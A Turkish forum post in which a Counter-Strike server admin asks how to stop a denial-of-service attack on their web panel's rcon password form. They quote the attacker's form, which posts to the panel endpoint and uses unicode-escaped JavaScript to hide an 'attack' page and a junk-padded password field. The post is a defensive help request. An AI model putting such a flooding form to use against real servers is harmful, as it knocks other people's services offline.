Post Açığı
-
arkadaşlar counter strike server için web panel kullanıyorumda bir açığı war şifre yazılan yere başka bir html dosyası ile oraya 309487230947320894 satır bir kod post edilince server timeout oluyor fixleyen yerler var fakat web panel dedicated'a yüklü vede php falan çalışmıyor webmodun basit bi kendi dili var ama o post edilen yer html ve javascript çalışıyor
şifre post formunun kodları şöyle:
<form action="ana.w" method="post" name="authform">
<p align="center"><br>
<img border="0" src="images2/kilit.png" width="257" height="256"><br>
<input type="password" name="rconpass">
<input type="submit" value="Girişi Onayla">
<input type="hidden" name="setcookiesNULL" value="rconpass">
</p>
</form>bu forma başka bir htmlden post edilen hack kodlarıda şöyle
<form action="http://paneladresi:27015/ana.w?redir=" method="post" name="authform">
<script type="text/javascript">document.write('\u003c\u0074\u0069\u0074\u006c\u0065\u003e\u0053\u0065\u0072\u0076\u0065\u0072\u0020\u0041\u0074\u0074\u0061\u0063\u006b\u0065\u0072\u0020\u0043\u006f\u0064\u0069\u006e\u0067\u0020\u0042\u0079\u0020\u0053\u0065\u0072\u006b\u0061\u006e\u0020\u0074\u0068\u006b\u002e\u006d\u0069\u0074\u006e\u0069\u0063\u006b\u0040\u0067\u006d\u0061\u0069\u006c\u002e\u0063\u006f\u006d\u003c\u002f\u0074\u0069\u0074\u006c\u0065\u003e')</script>
<script type="text/javascript">document.write('\u003c\u0062\u003e\u0053\u0061\u0064\u0065\u0063\u0065\u0020\u0053\u0061\u006c\u0064\u0131\u0072\u0020\u0054\u0075\u0073\u0075\u006e\u0061\u0020\u0042\u0061\u0073\u006d\u0061\u006e\u0131\u007a\u0020\u0059\u0065\u0074\u0065\u0072\u006c\u0069\u002e\u003c\u002f\u0062\u003e\u003c\u0062\u0072\u003e\u000a\u003c\u0066\u006f\u006e\u0074\u0020\u0073\u0069\u007a\u0065\u003d\u0022\u002d\u0032\u0022\u003e\u0028\u0020\u0043\u006f\u0064\u0069\u006e\u0067\u0020\u0042\u0079\u0020\u0053\u0065\u0072\u0071\u0061\u006e\u002e\u005b\u0020\u0074\u0068\u006b\u002e\u006d\u0069\u0074\u006e\u0069\u0063\u006b\u0040\u0067\u006d\u0061\u0069\u006c\u002e\u0063\u006f\u006d\u0020\u005d\u0020\u0029\u003c\u002f\u0066\u006f\u006e\u0074\u003e\u003c\u0062\u0072\u003e\u003c\u0062\u0072\u003e\u000a\u003c\u0069\u006e\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0070\u0061\u0073\u0073\u0077\u006f\u0072\u0064\u0022\u0020\u006e\u0061\u006d\u0065\u003d\u0022\u0072\u0063\u006f\u006e\u0070\u0061\u0073\u0073\u0022\u002b\\u002f\u0027\u002b\u0026\u0027\u0026\u0028\u0029\u0026\u0026\u003f\u0028\u002f\u0026\u0027\u0026\u0028\u0027\u0025\u003f\u0027\u005e\u002b\u0025')</script> bu aslında bu kodların en az 20 katı fazla ama ben bu kadarını yazayım birşey farketmez hepsi aynı zaten.bunu nasıl fixleyebilirm fixleyen yerler var ama hiçbiri yardımda bulunmuyor. birşey dikkatimi çekti o post adresi ana.w?redir=" bunu değiştirme imkanım varmı? yada ? eklendğinde sayfa görüntülenmemesi falan yapabilirmiym sadece javascript html kullanabiliyorum yardımlarınız için teşekkürler
-
ha bir de kodları bi html olarak yapıştırın ve çok şaşıracaksınız
sayfada formun üzerinde
Sadece Saldır Tusuna Basmanız Yeterli.
( Coding By Serqan.[ thk.mitnick@gmail.com ] )yazıyor hatta sayfanın titlesi bile ayarlanmış nasıl bir zekadır bu nasıl yapmış hala anlayamadım titleyi bile göremiyorum text olarak açtığımda ama var çok garip
yardımlarınızı bkliyorum
